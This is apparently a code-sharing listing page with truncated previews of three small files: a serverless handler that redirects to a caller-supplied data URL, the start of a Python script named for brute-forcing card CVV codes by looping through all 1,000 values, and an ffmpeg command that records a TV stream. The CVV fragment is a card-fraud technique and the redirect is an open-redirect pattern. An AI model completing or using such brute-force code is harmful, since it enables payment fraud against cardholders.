View redirect.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import validDataUrl from "valid-data-url" | |
export default defineComponent({ | |
async run({ steps, $ }) { | |
const b64Uri = steps.trigger.event.query.uri; | |
if (validDataUrl(b64Uri)) { | |
await $.respond({ | |
status: 302, | |
headers: { | |
"Location": b64Uri |
View snapper_cvv_brute_force.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import random | |
import time | |
import requests | |
# may not work for native cards | |
def brute_force_cvv(card_number): | |
for i in range(0, 1000): | |
num = str(i).zfill(3) |
View tvnz2_example.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ffmpeg -i "https://i.mjh.nz/nz/tv.10.m3u8" -bsf:a aac_adtstoasc -vcodec copy -c copy -crf 50 file.mp4 |